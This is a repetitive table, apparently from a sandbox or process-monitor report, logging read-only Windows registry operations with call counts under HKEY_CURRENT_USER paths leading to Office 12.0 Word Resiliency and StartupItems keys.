| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
3 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency\StartupItems |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0\Word\Resiliency |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\Software\Microsoft\Office\12.0 |
